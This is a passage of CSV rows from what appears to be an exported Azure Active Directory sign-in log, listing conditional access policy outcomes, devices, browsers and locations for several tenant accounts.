'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ca20f843-0c09-4066-88a0-3d47d0f41600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ca20f843-0c09-4066-88a0-3d47d0f41600,SigninLogs,Sucess,36.6404686,-78.26995087
+683,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:33.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f7ba3cc7-11fe-4554-9ac4-efce7ddc1300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f7ba3cc7-11fe-4554-9ac4-efce7ddc1300,SigninLogs,Sucess,50.6406517,5.572050095
+684,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:34.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,660c5cdf-3fcd-4acd-8c84-eacd84de63a2,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",ace1d4a5-fd0b-463d-bfa6-011c541e1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ace1d4a5-fd0b-463d-bfa6-011c541e1600,SigninLogs,Sucess,41.90428925,-85.99833679
+685,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:20.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5aaa468b-6299-42ac-808e-87af21ed8e32,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0837a9e3-f941-4973-a561-a80d08391600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0837a9e3-f941-4973-a561-a80d08391600,SigninLogs,Sucess,36.6404686,-78.26995087
+686,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:12.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",6d9cea8b-fbf7-41d5-8285-85bac03d1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6d9cea8b-fbf7-41d5-8285-85bac03d1400,SigninLogs,Sucess,50.6406517,5.572050095
+687,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:57,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",0e9e6ec2-3909-45d6-890e-098638364800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0e9e6ec2-3909-45d6-890e-098638364800,SigninLogs,Sucess,32.32146072,34.85319901
+688,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:04.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ef0a1e80-9cfd-49bd-872c-429dfdac8205,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",ed279ba5-6389-4198-91ad-627ed6741400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ed279ba5-6389-4198-91ad-627ed6741400,SigninLogs,Sucess,32.32146072,34.85319901
+689,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,15f5cb55-8e4e-4ca8-ac2e-85ad97d78253,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c883e3df-3efa-4676-93e1-2d979f6c1600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c883e3df-3efa-4676-93e1-2d979f6c1600,SigninLogs,Sucess,50.6406517,5.572050095
